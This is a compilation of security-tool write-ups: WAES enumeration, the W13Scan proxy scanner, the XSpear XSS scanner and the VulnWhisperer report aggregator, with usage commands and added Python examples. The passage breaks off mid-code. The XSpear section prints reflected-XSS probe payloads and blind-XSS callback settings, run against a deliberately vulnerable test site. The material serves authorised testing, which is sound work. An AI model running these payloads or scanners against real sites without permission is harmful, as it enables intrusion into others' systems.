WAES – Auto Enums Websites And Dumps Files As Result

Doing HTB or other CTF enumeration against targets running HTTP(S) can become tedious: the same scripts and tests (nmap, nikto, dirb and so on) get run on every box. A one-click run against the target with reports generated automatically solves this, and a script lets the enumeration process be optimized to save the tester time. This is what CPH:SEC WAES (Web Auto Enum & Scanner) was created for. WAES runs four steps of scanning against the target (see below) to make the best use of scanning time. Multi-core or multi-threaded scanning could be implemented, but it would almost certainly hang CTF boxes and so is undesirable.

From the current version forward WAES includes an install script (see below) as the project moves from alpha to beta. WAES could have been written in Python, but good bash projects are needed for learning bash. WAES is currently made for CTF boxes and is moving towards online use (see the To Do section).

To install:

1. $> git clone https://github.com/Shiva108/WAES.git
2. $> cd WAES
3. $> sudo ./install.sh

Make sure the wordlist directories are set correctly in supergobuster.sh. This should be automatic on Kali and Parrot Linux.

Standard directories for lists: SecLists/Discovery/Web-Content and SecLists/Discovery/Web-Content/CMS
Kali / Parrot directory list: /usr/share/wordlists/dirbuster/

To run WAES:

  ##############################################################################
  # Web Auto Enum & Scanner - Auto enums website(s) and dumps files as result. #
  ##############################################################################

  Usage: waes.sh -u {IP}
         waes.sh -h

    -h    shows this help
    -u    IP to test
    -p    port number (default=80)

  Example: ./waes.sh -u {IP} -p 8080

Enumeration Process / Method

WAES runs the following steps against the target while dumping result files in the report/ folder:

Step 0 - Passive scan (disabled in the current version)
  whatweb - aggressive mode
  OSIRA (same author) - looks for subdomains

Step 1 - Fast scan
  wafw00f - firewall detection
  nmap with http-enum

Step 2 - Scan - in-depth
  nmap - with NSE scripts: http-date, http-title, http-server-header, http-headers, http-enum, http-devframework, http-dombased-xss, http-stored-xss, http-xssed, http-cookie-flags, http-errors, http-grep, http-traceroute
  nmap with vulscan (CVSS 5.0+)
  nikto - with evasion A and all CGI dirs
  uniscan - all tests except the stress test (qweds)

Step 3 - Fuzzing
  super gobuster: gobuster with multiple lists
  dirb with multiple lists
  xss scan (to come)

To Do
  Implement domain as input
  Add XSS scan
  Add SSL/TLS scanning
  Add domain scans
  Add golismero
  Add dirble
  Add progress bar
  Add CMS detection
  Add CMS-specific scans

Download WAES

Link: http://feedproxy.google.com/~r/PentestTools/~3/lznYl-dDkGU/waes-auto-enums-websites-and-dumps.html

W13Scan – Passive Security Scanner

W13scan is a proxy-based web scanner that runs on Linux/Windows/Mac systems. It is pure Python and requires Python >= 3. If you find it useful, star the repository to encourage the author.

Install

  pip3 install w13scan

Usage

  ## help
  w13scan -h

  ## running
  w13scan -s

Support

If you want w13scan to support HTTPS, then, as with Burp Suite, you first need to set up the proxy server (default), then go to http://w13scan.ca to download the root certificate and trust it.

Development

  from W13SCAN.api import Scanner

  scanner = Scanner(threads=20)
  scanner.put("http://example.com/?post=1")
  scanner.run()

By importing the w13scan package, you can quickly create a scanner.

Download W13Scan
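The passive side of a proxy-based scanner is the part the snippet above does not show: the proxy sees every request the browser makes, and the scanner has to decide which of them are worth handing to the active checks (the equivalent of the scanner.put() call). The Python below is an added example and not W13scan's own code; it shows the two decisions that matter in that stage, scope enforcement and endpoint deduplication by parameter names rather than values. The CAPTURED list is constructed traffic, not a real proxy log, and the scope host is an assumption.

```python
"""Passive collection stage of a proxy-based scanner (added example; not
W13scan's own code). The proxy hands every observed request to `observe`;
only in-scope requests for endpoints not seen before reach the scan queue."""
from urllib.parse import urlsplit, parse_qsl


def endpoint_key(method, url):
    """Key that identifies an endpoint by method, host, path and the *names*
    of its parameters, ignoring their values, so page=1 and page=2 collide."""
    parts = urlsplit(url)
    names = tuple(sorted({k for k, _ in parse_qsl(parts.query, keep_blank_values=True)}))
    return (method.upper(), parts.scheme.lower(), parts.netloc.lower(), parts.path or "/", names)


class PassiveCollector:
    def __init__(self, scope_hosts):
        self.scope = {h.lower() for h in scope_hosts}
        self.seen = set()
        self.queue = []   # what you would hand to Scanner.put(), one URL per endpoint shape

    def observe(self, method, url):
        """Return True when the request was queued for active testing."""
        host = urlsplit(url).netloc.lower()
        if host not in self.scope:
            return False                # never test hosts the tester is not authorised for
        key = endpoint_key(method, url)
        if key in self.seen:
            return False                # same endpoint shape already queued
        self.seen.add(key)
        self.queue.append((method.upper(), url))
        return True


# Constructed traffic, as if read from the proxy's log (not a real capture).
CAPTURED = [
    ("GET",  "http://example.com/?post=1"),
    ("GET",  "http://example.com/?post=2"),             # same endpoint, new value
    ("GET",  "http://example.com/?post=2&preview=1"),   # new parameter set
    ("POST", "http://example.com/?post=1"),             # different method
    ("get",  "http://EXAMPLE.com/?post=3"),             # only case differs
    ("GET",  "http://cdn.example.net/app.js"),          # out of scope
    ("GET",  "http://example.com/login"),
]


def collect(traffic, scope=("example.com",)):
    """Run the collector over captured traffic and return the scan queue."""
    collector = PassiveCollector(scope)
    for method, url in traffic:
        collector.observe(method, url)
    return collector.queue


if __name__ == "__main__":
    for method, url in collect(CAPTURED):
        print(method, url)
```

Of the seven captured requests only four reach the queue; the out-of-scope CDN host is dropped outright, and the repeated GET to the same endpoint with a different post= value is folded into the first one.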

Link: http://feedproxy.google.com/~r/PentestTools/~3/ChH63pCUMoU/w13scan-passive-security-scanner.html

XSpear – Powerful XSS Scanning And Parameter Analysis Tool

XSpear is an XSS scanner distributed as a Ruby gem.

Key features

- Pattern-matching based XSS scanning
- Detects alert/confirm/prompt events in a headless browser (with Selenium)
- Tests request/response for XSS protection bypass and reflected params
  - Reflected params
  - Filtered test: event handlers, HTML tags, special chars
- Tests blind XSS (with XSS Hunter, ezXSS, HBXSS, etc.; any URL-based blind test)
- Dynamic/static analysis
  - Finds SQL error patterns
  - Analyses security headers (CSP, HSTS, X-Frame-Options, X-XSS-Protection, etc.)
  - Analyses other headers (Server version, Content-Type, etc.)
- Scanning from a raw request file (Burp Suite, ZAP request)
- XSpear usable from Ruby code (as a gem library)
- Table-based CLI report showing the filtered rules and the raw queries (URLs) tested
- Testing at selected parameters
- Output formats: cli, json (cli: summary, filtered rules (params), raw queries)
- Verbosity levels (quiet / normal / raw data)
- Custom callback code to test various attack vectors

Installation

Install it yourself as:

  $ gem install XSpear

Or install it from a local file:

  $ gem install XSpear-{version}.gem

Or add this line to your application's Gemfile:

  gem 'XSpear'

and then execute:

  $ bundle

Dependency gems: colorize, selenium-webdriver, terminal-table. If you configured them to install automatically with the gem but XSpear behaves abnormally, install them explicitly:

  $ gem install colorize
  $ gem install selenium-webdriver
  $ gem install terminal-table

Usage on CLI

  Usage: xspear -u [target] -[options] [value]

  [ e.g ]
  $ ruby a.rb -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'

  [ Options ]
      -u, --url=target_URL             [required] Target URL
      -d, --data=POST Body             [optional] POST method body data
          --headers=HEADERS            [optional] Add HTTP headers
          --cookie=COOKIE              [optional] Add cookie
          --raw=FILENAME               [optional] Load raw file (e.g. raw_sample.txt)
      -p, --param=PARAM                [optional] Test parameters
      -b, --BLIND=URL                  [optional] Add vector of blind XSS
                                        + with XSS Hunter, ezXSS, HBXSS, etc.
                                        + e.g.: -b https://hahwul.xss.ht
      -t, --threads=NUMBER             [optional] Threads, default: 10
      -o, --output=FILENAME            [optional] Save JSON result
      -v, --verbose=1~3                [optional] Show log depth
                                        + Default value: 2
                                        + v=1 : quiet mode
                                        + v=2 : show scanning log
                                        + v=3 : show detail log (req/res)
      -h, --help                       Prints this help
          --version                    Show XSpear version
          --update                     Update online

Result types

  (I)NFO:   information (e.g. SQL error, filtered rule, reflected params, etc.)
  (V)ULN:   vulnerable XSS, alert/prompt/confirm confirmed with Selenium
  (L)OW:    low level issue
  (M)EDIUM: medium level issue
  (H)IGH:   high level issue

Case by case

Scanning XSS:
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"

JSON output:
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 1

Detail log:
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -v 3

Set threads:
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30

Testing at selected parameters:
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -p cat,test

Testing blind XSS:
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwul.xss.ht"

etc.

Sample log

Scanning XSS:

  xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=z"

  [ v1.0.7 ]
  [*] creating a test query.
  [*] test query generation is complete. [149 query]
  [*] starting test and analysis. [10 threads]
  [I] [00:37:34] reflected 'XsPeaR
  [-] [00:37:34] 'cat' Not reflected |XsPeaR
  [I] [00:37:34] [param: cat][Found SQL Error Pattern]
  [-] [00:37:34] 'STATIC' not reflected
  [I] [00:37:34] reflected "XsPeaR
  [-] [00:37:34] 'cat' Not reflected ;XsPeaR
  [I] [00:37:34] reflected `XsPeaR
  ...snip...
  [H] [00:37:44] reflected "><iframe/src=JavaScriPt:alert(45)>[param: cat][reflected XSS Code]
  [-] [00:37:44] 'cat' not reflected <img/src onerror=alert(45)>
  [-] [00:37:44] 'cat' not reflected <svg/onload=alert(45)>
  [-] [00:37:49] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)>
  [-] [00:37:49] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)>
  [-] [00:37:50] 'cat' not found alert/prompt/confirm event <xmp><p title="</xmp><svg/onload=alert(45)>">
  [-] [00:37:51] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)>
  [V] [00:37:51] found alert/prompt/confirm (45) in selenium!! <script>alert(45)</script> => [param: cat][triggered <script>alert(45)</script>]
  [V] [00:37:51] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)> => [param: cat][triggered <svg/onload=alert(45)>]
  [*] finish scan. the report is being generated..

  +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
  | [ XSpear report ]                                                                                                                 |
  | http://testphp.vulnweb.com/listproducts.php?cat=z                                                                                 |
  | 2019-07-24 00:37:33 +0900 ~ 2019-07-24 00:37:51 +0900 Found 12 issues.                                                            |
  +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
  | NO | TYPE  | ISSUE            | METHOD | PARAM | PAYLOAD                             | DESCRIPTION                                |
  +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
  | 0  | INFO  | DYNAMIC ANALYSIS | GET    | cat   | XsPeaR"                             | Found SQL Error Pattern                    |
  | 1  | INFO  | STATIC ANALYSIS  | GET    | -     | original query                      | Found Server: nginx/1.4.1                  |
  | 2  | INFO  | STATIC ANALYSIS  | GET    | -     | original query                      | Not set HSTS                               |
  | 3  | INFO  | STATIC ANALYSIS  | GET    | -     | original query                      | Content-Type: text/html                    |
  | 4  | LOW   | STATIC ANALYSIS  | GET    | -     | original query                      | Not Set X-Frame-Options                    |
  | 5  | MIDUM | STATIC ANALYSIS  | GET    | -     | original query                      | Not Set CSP                                |
  | 6  | INFO  | REFLECTED        | GET    | cat   | rEfe6                               | reflected parameter                        |
  | 7  | INFO  | FILERD RULE      | GET    | cat   | onhwul=64                           | not filtered event handler on{any} pattern |
  | 8  | HIGH  | XSS              | GET    | cat   | <script>alert(45)</script>          | reflected XSS Code                         |
  | 9  | HIGH  | XSS              | GET    | cat   | "><iframe/src=JavaScriPt:alert(45)> | reflected XSS Code                         |
  | 10 | VULN  | XSS              | GET    | cat   | <script>alert(45)</script>          | triggered <script>alert(45)</script>       |
  | 11 | VULN  | XSS              | GET    | cat   | '"><svg/onload=alert(45)>           | triggered <svg/onload=alert(45)>           |
  +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+

  < Available Objects >
  [cat] param
   + Available Special Char: ' \ ` ) [ } : . { ] $
   + Available Event Handler: "onActivate","onBeforeActivate","onAfterUpdate","onAbort","onAfterPrint","onBeforeCopy","onBeforeCut","onBeforePaste","onBlur","onBeforePrint","onBeforeDeactivate","onBeforeUpdate","onBeforeEditFocus","onBegin","onBeforeUnload","onBounce","onDataSetChanged","onCellChange","onClick","onDataAvailable","onChange","onContextMenu","onCopy","onControlSelect","onDataSetComplete","onCut","onDragStart","onDragEnter","onDragOver","onDblClick","onDragEnd","onDrop","onDeactivate","onDragLeave","onDrag","onDragDrop","onHashChange","onFocusOut","onFilterChange","onEnd","onFocus","onHelp","onErrorUpdate","onFocusIn","onFinish","onError","onLayoutComplete","onKeyDown","onKeyUp","onMediaError","onLoad","onMediaComplete","onInput","onKeyPress","onloadstart","onLoseCapture","onMouseOut","onMouseDown","onMouseWheel","onMove","onMouseLeave","onMessage","onMouseEnter","onMouseMove","onMouseOver","onMouseUp","onPropertyChange","onMoveStart","onProgress","onPopState","onPaste","onOnline","onMoveEnd","onPause","onOutOfSync","onOffline","onReverse","onResize","onRedo","onRowsEnter","onRepeat","onReset","onResizeEnd","onResizeStart","onReadyStateChange","onResume","onRowInserted","onStart","onScroll","onRowExit","onSelectionChange","onSeek","onStop","onRowDelete","onSelectStart","onSelect","ontouchstart","ontouchend","onTrackChange","onSyncRestored","onTimeError","onUndo","onURLFlip","onStorage","onUnload","onSubmit","ontouchmove"
   + Available HTML Tag: "meta","video","iframe","embed","script","audio","svg","object","img","frameset","applet","style","frame"
   + Available Useful Code: "document.cookie","document.location","window.location"

  < Raw Query >
  [0] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zXsPeaR%22
  [1] http://testphp.vulnweb.com/listproducts.php?cat=z?-
  [2] http://testphp.vulnweb.com/listproducts.php?cat=z?-
  [3] http://testphp.vulnweb.com/listproducts.php?cat=z?-
  [4] http://testphp.vulnweb.com/listproducts.php?cat=z?-
  [5] http://testphp.vulnweb.com/listproducts.php?cat=z?-
  [6] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zrEfe6
  [7] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%5C%22%3E%3Cxspear+onhwul%3D64%3E
  [8] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
  [9] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Ciframe%2Fsrc%3DJavaScriPt%3Aalert%2845%29%3E
  [10] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
  [11] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%27%22%3E%3Csvg%2Fonload%3Dalert%2845%29%3E

To JSON:

  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 1
  {
    "starttime": "2019-07-17 01:02:13 +0900",
    "endtime": "2019-07-17 01:02:59 +0900",
    "issue_count": 24,
    "issue_list": [
      {"id":0,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yy%3CXsPeaR","description":"not filtered \u001b[0;34;49m<\u001b[0m"},
      {"id":1,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%27","description":"not filtered \u001b[0;34;49m'\u001b[0m"},
      {"id":2,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%3E","description":"not filtered \u001b[0;34;49m>\u001b[0m"},
      {"id":3,"type":"INFO","issue":"REFLECTED","payload":"searchFor=yyrEfe6","description":"reflected parameter"},
      {"id":4,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%22","description":"not filtered \u001b[0;34;49m\"\u001b[0m"},
      {"id":5,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%60","description":"not filtered \u001b[0;34;49m`\u001b[0m"},
      {"id":6,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%3B","description":"not filtered \u001b[0;34;49m;\u001b[0m"},
      {"id":7,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%28","description":"not filtered \u001b[0;34;49m(\u001b[0m"},
      {"id":8,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%7C","description":"not filtered \u001b[0;34;49m|\u001b[0m"},
      {"id":9,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%29","description":"not filtered \u001b[0;34;49m)\u001b[0m"},
      {"id":10,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%7B","description":"not filtered \u001b[0;34;49m{\u001b[0m"},
      {"id":11,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%5B","description":"not filtered \u001b[0;34;49m[\u001b[0m"},
      {"id":12,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%5D","description":"not filtered \u001b[0;34;49m]\u001b[0m"},
      {"id":13,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%7D","description":"not filtered \u001b[0;34;49m}\u001b[0m"},
      {"id":14,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%3A","description":"not filtered \u001b[0;34;49m:\u001b[0m"},
      {"id":15,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%2B","description":"not filtered \u001b[0;34;49m+\u001b[0m"},
      {"id":16,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR.","description":"not filtered \u001b[0;34;49m.\u001b[0m"},
      {"id":17,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR-","description":"not filtered \u001b[0;34;49m-\u001b[0m"},
      {"id":18,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%2C","description":"not filtered \u001b[0;34;49m,\u001b[0m"},
      {"id":19,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%3D","description":"not filtered \u001b[0;34;49m=\u001b[0m"},
      {"id":20,"type":"HIGH","issue":"XSS","payload":"searchFor=yy%3Cimg%2Fsrc+onerror%3Dalert%2845%29%3E","description":"reflected \u001b[0;31;49mXSS Code\u001b[0m"},
      {"id":21,"type":"HIGH","issue":"XSS","payload":"searchFor=yy%3Csvg%2Fonload%3Dalert%2845%29%3E","description":"reflected \u001b[0;31;49mXSS Code\u001b[0m"},
      {"id":22,"type":"HIGH","issue":"XSS","payload":"searchFor=yy%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E","description":"reflected \u001b[0;31;49mXSS Code\u001b[0m"},
      {"id":23,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%24","description":"not filtered \u001b[0;34;49m$\u001b[0m"}
    ]
  }

Usage on Ruby code (gem library)

  require 'XSpear'
  require 'json'   # needed for JSON.parse below

  # Set options
  options = {}
  options['thread'] = 30
  options['cookie'] = "data=123"
  options['blind'] = "https://hahwul.xss.ht"
  options['output'] = 'json'

  # Create an XSpear object with url and options
  s = XspearScan.new "https://www.hahwul.com?target_url", options

  # Scan, then fetch the report as JSON
  s.run
  result = s.report.to_json
  r = JSON.parse result

Add a scanning module

1) Add a makeQueryPattern call:

  makeQueryPattern('type', 'query,', 'pattern', 'category', "description", "callback function")
  # type: f(iltered?) r(eflected?) x(ss?)
  # category: i(nfo) v(uln) l(ow) m(edium) h(igh)
  # e.g.
  # makeQueryPattern('f', 'XsPeaR,', 'XsPeaR,', 'i', "not filtered "+",".blue, CallbackStringMatch)

2) If you need a different callback, write a callback class that overrides ScanCallbackFunc, e.g.:

  class CallbackStringMatch < ScanCallbackFunc
    def run
      # The callback returns [matched?, message]; here a match means the
      # query string was echoed back verbatim in the response body.
      if @response.body.include? @query
        [true, "reflected #{@query}"]
      else
        [false, "not reflected #{@query}"]
      end
    end
  end

Parent class (ScanCallbackFunc):

  class ScanCallbackFunc
    def initialize(url, method, query, response)
      @url = url
      @method = method
      @query = query
      @response = response
      # self.run
    end

    def run
      # override
    end
  end

Common callback classes: CallbackXSSSelenium, CallbackErrorPatternMatch, CallbackCheckHeaders, CallbackStringMatch, CallbackNotAdded, etc.

Update

If you are a normal user:
  $ gem update XSpear

If you are a developer (soft):
  $ git pull -v

If you are a developer (hard):
  $ git reset --hard HEAD; git pull -v

Development

After checking out the repo, run bin/setup to install dependencies. Then run rake spec to run the tests. You can also run bin/console for an interactive prompt that will allow you to experiment.

To install this gem onto your local machine, run bundle exec rake install. To release a new version, update the version number in version.rb and then run bundle exec rake release, which will create a git tag for the version, push git commits and tags, and push the .gem file to rubygems.org.

Contributing

Bug reports and pull requests are welcome on GitHub at https://github.com/hahwul/XSpear. This project is intended to be a safe, welcoming space for collaboration, and contributors are expected to adhere to the Contributor Covenant code of conduct.

Code of Conduct

Everyone interacting in the XSpear project's codebases, issue trackers, chat rooms and mailing lists is expected to follow the code of conduct.

Download XSpear
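The report above comes from two techniques worth seeing in code: the canary-plus-character probes that produce the "Available Special Char" list (and decide which payload shapes are even worth sending), and the static header checks behind report rows 1 to 5. The Python below is an added example written for this page, not XSpear's code (XSpear itself is Ruby, and it additionally confirms findings in Selenium). The target page mock_target is a constructed stand-in that HTML-encodes only the angle brackets, the probed character set and the severity mapping follow the report on this page, and the header dict is constructed too.

```python
"""Canary-based filter analysis and static header checks (added example,
modelled on XSpear's report; not XSpear's own code, which is Ruby)."""

CANARY = "XsPeaR"
# Characters probed one at a time after the canary, as in the report above.
SPECIAL_CHARS = list('<>"\'`;(){}[]:+.-,=$|\\')


def mock_target(params):
    """Constructed stand-in for a vulnerable page. It HTML-encodes only the
    angle brackets, so new-tag injection fails but attribute break-out does not."""
    q = params.get("cat", "")
    partial = q.replace("<", "&lt;").replace(">", "&gt;")
    return ('<html><body><input name="cat" value="%s">'
            '<p>Results for %s</p></body></html>' % (partial, partial))


def reflected_chars(send, param, base_params):
    """Send CANARY+char for each special char; a char is 'available' when the
    exact probe comes back in the body, i.e. it was neither filtered nor encoded."""
    available = []
    for ch in SPECIAL_CHARS:
        probe = CANARY + ch
        if probe in send(dict(base_params, **{param: probe})):
            available.append(ch)
    return available


def suggest_vectors(available):
    """Pick payload shapes that only use characters known to survive."""
    vectors = []
    if "<" in available and ">" in available:
        vectors.append("<svg/onload=alert(45)>")              # new-tag injection
    for quote in ('"', "'"):
        if quote in available:                                # attribute break-out
            vectors.append('%s autofocus onfocus=alert(45) x=%s' % (quote, quote))
    return vectors


def confirm_reflection(send, param, base_params, vector):
    """Weakest confirmation: the vector is echoed unmodified (XSpear's [H] level).
    XSpear's [V] level goes further and watches for alert/prompt/confirm in Selenium."""
    return vector in send(dict(base_params, **{param: vector}))


def analyze_headers(headers):
    """Static header analysis; severities copied from rows 1-5 of the report above."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []
    if "server" in h:
        findings.append(("INFO", "Found Server: " + h["server"]))
    if "strict-transport-security" not in h:
        findings.append(("INFO", "Not set HSTS"))
    if "content-type" in h:
        findings.append(("INFO", "Content-Type: " + h["content-type"]))
    if "x-frame-options" not in h:
        findings.append(("LOW", "Not Set X-Frame-Options"))
    if "content-security-policy" not in h:
        findings.append(("MEDIUM", "Not Set CSP"))
    return findings


def demo():
    """Run the whole flow against the mock page and constructed headers."""
    base = {"cat": "z"}
    chars = reflected_chars(mock_target, "cat", base)
    confirmed = [v for v in suggest_vectors(chars)
                 if confirm_reflection(mock_target, "cat", base, v)]
    headers = {"Server": "nginx/1.4.1", "Content-Type": "text/html"}  # constructed
    return chars, confirmed, analyze_headers(headers)


if __name__ == "__main__":
    chars, confirmed, findings = demo()
    print("Available Special Char:", " ".join(chars))
    for v in confirmed:
        print("[H] reflected", v)
    for sev, msg in findings:
        print("[%s] %s" % (sev, msg))
```

Against the mock page the angle brackets drop out of the available set, so no tag-based payload is tried, but both quote characters survive and the attribute break-out vectors are reflected verbatim. That is the practical value of the filter analysis: it tells you which payload family to spend requests on before any XSS payload is sent.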

Link: http://feedproxy.google.com/~r/PentestTools/~3/1eiuhzEnVo4/xspear-powerfull-xss-scanning-and.html

VulnWhisperer – Create Actionable Data From Your Vulnerability Scans

Create actionable data from your vulnerability scans.

VulnWhisperer is a vulnerability management tool and report aggregator. It pulls all the reports from the different vulnerability scanners and creates a file with a unique filename for each one, then uses that data to sync with Jira and to feed Logstash. Jira does a closed-cycle full sync with the data provided by the scanners, while Logstash indexes and tags all of the information inside the report (see the Logstash files at /resources/elk6/pipeline/). The data is then shipped to Elasticsearch to be indexed and ends up in a visual, searchable format in Kibana with predefined dashboards.

Currently supports

Vulnerability frameworks:
- Nessus (v6/v7/v8)
- Qualys Web Applications
- Qualys Vulnerability Management
- OpenVAS (v7/v8/v9)
- Tenable.io
- Detectify
- Nexpose
- InsightVM
- NMAP
- Burp Suite
- OWASP ZAP
- More to come

Reporting frameworks:
- ELK
- Jira
- Splunk

Getting started

1. Follow the install requirements.
2. Fill out the section you want to process in the frameworks_example.ini file.
3. [JIRA] If using Jira, fill in the Jira config in the config file mentioned above.
4. [ELK] Modify the IP settings in the Logstash files to accommodate your environment and import them into your Logstash conf directory (default is /etc/logstash/conf.d/).
5. [ELK] Import the Kibana visualizations.
6. Run VulnWhisperer.

Need assistance or just want to chat? Join our Slack channel.

Requirements
- Python 2.7
- A vulnerability scanner
- Reporting system: Jira / Elastic Stack 6.6

Install requirements - VulnWhisperer (may require sudo)

Install the OS package dependencies (Debian-based distros; CentOS does not need this):

  sudo apt-get install zlib1g-dev libxml2-dev libxslt1-dev

(Optional) Use a Python virtualenv so as not to mess with the host Python libraries:

  virtualenv venv            (creates the Python 2.7 virtualenv)
  source venv/bin/activate   (starts the virtualenv; pip now runs inside it and installs libraries without sudo)
  deactivate                 (quits the virtualenv once you are done)

Install the Python library requirements:

  pip install -r /path/to/VulnWhisperer/requirements.txt
  cd /path/to/VulnWhisperer
  python setup.py install

(Optional) If using a proxy, export the proxy URL as environment variables:

  export HTTP_PROXY=http://example.com:8080
  export HTTPS_PROXY=http://example.com:8080

Now you're ready to pull down scans (see the Run section).

Configuration

There are a few configuration steps to setting up VulnWhisperer:
- Configure the ini file
- Set up the Logstash file
- Import the Elasticsearch templates
- Import the Kibana dashboards

frameworks_example.ini file

Run

To run, fill out the configuration file with your vulnerability scanner settings. Then you can execute from the command line (the optional flag -F provides "fancy" log colouring, useful when running VulnWhisperer manually):

  vuln_whisperer -c configs/frameworks_example.ini -s nessus

or

  vuln_whisperer -c configs/frameworks_example.ini -s qualys

If no section is specified (e.g. -s nessus), VulnWhisperer checks the config file for the modules that have the property enabled=true and runs them sequentially.

Next you'll need to import the visualizations into Kibana and set up your Logstash config. You can either follow the sample setup instructions at https://github.com/HASecuritySolutions/VulnWhisperer/wiki/Sample-Guide-ELK-Deployment or go for the docker-compose solution we offer.

Docker-compose

ELK is a whole world by itself, and for newcomers to the platform it requires basic Linux skills and usually a bit of troubleshooting until it is deployed and working as expected. As we are not able to provide support for each user's ELK problems, we put together a docker-compose which includes:
- VulnWhisperer
- Logstash 6.6
- Elasticsearch 6.6
- Kibana 6.6

The docker-compose just requires specifying the paths where the VulnWhisperer data will be saved and where the config files reside. If run directly after git clone, with just the scanner config added to the VulnWhisperer config file (/resources/elk6/vulnwhisperer.ini), it works out of the box. It also loads the Kibana dashboards and visualizations automatically through the API, which otherwise has to be done manually at Kibana's startup.

For more info about the docker-compose, check the docker-compose wiki or the FAQ.

Roadmap

Our current roadmap is as follows:
- Create a Vulnerability Standard
- Map every scanner's results to the standard
- Create scanner module guidelines for easy integration of new scanners (consistency will allow #14)
- Refactor the code to reuse functions and enable full compatibility among modules
- Change Nessus CSV to JSON (consistency, and fix #82)
- Adapt the single Logstash pipeline to the standard and the Kibana dashboards
- Implement the Detectify scanner
- Implement Splunk reporting/dashboards

On top of this, we try to focus on fixing bugs as soon as possible, which might delay development. We also welcome PRs, and once the new standard is implemented it will be very easy to add compatibility with new scanners.

The Vulnerability Standard will initially be a simple one-level JSON with all the information that matches across the different scanners given standardized variable names, while keeping the rest of the variables as they are. In the future, once everything is implemented, we will evaluate moving to an existing standard like ECS or the AWS Vulnerability Schema; we prioritize functionality over perfection.

Video walkthrough - featured on an Elastic webinar

Authors
- Austin Taylor (@HuntOperator)
- Justin Henderson (@smapper)

Contributors
- Quim Montal (@qmontal)
- @pemontto
- @cybergoof

Download VulnWhisperer
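The roadmap's "one-level JSON with standardized variable names, keeping the rest as they are" is easy to describe and easy to get subtly wrong (nested objects creep in, two scanners emit the same column name with different meanings, ports end up as strings in one record and numbers in the next). The Python below is an added example for this page, not VulnWhisperer's code: it maps two constructed exports, a Nessus-style CSV and an OpenVAS-style row set, onto one flat record shape and namespaces every leftover column by scanner. The field names in STANDARD_FIELDS and both sample exports are assumptions made for the illustration.

```python
"""Added example of the 'one-level JSON standard' the roadmap describes:
two constructed scanner exports mapped onto shared field names, with every
other field kept under a scanner prefix. Not VulnWhisperer's code; the
field names in STANDARD_FIELDS are an assumption for the illustration."""
import csv
import io
import json

STANDARD_FIELDS = ("scanner", "asset", "port", "protocol",
                   "plugin_id", "plugin_name", "cve", "cvss", "risk")

# Constructed Nessus-style CSV export (not a real scan).
NESSUS_CSV = """Plugin ID,CVE,CVSS,Risk,Host,Protocol,Port,Name,Synopsis
10863,,5.0,Medium,10.0.0.5,tcp,443,SSL Certificate Cannot Be Trusted,The SSL certificate for this service cannot be trusted.
"""

# Constructed OpenVAS-style rows (not a real scan).
OPENVAS_ROWS = [
    {"nvt_oid": "1.3.6.1.4.1.25623.1.0.103692", "cve": "CVE-2016-2183",
     "severity": "7.5", "threat": "High", "host": "10.0.0.9", "port": "3389/tcp",
     "nvt_name": "SSL/TLS: Report Vulnerable Cipher Suites", "qod": "80"},
]


def _keep_rest(rec, row, used, prefix):
    """Keep non-standard columns as they are, namespaced so scanners never collide."""
    for k, v in row.items():
        if k not in used:
            rec[prefix + k.lower().replace(" ", "_")] = v
    return rec


def normalize_nessus(row):
    used = {"Host", "Port", "Protocol", "Plugin ID", "Name", "CVE", "CVSS", "Risk"}
    rec = {
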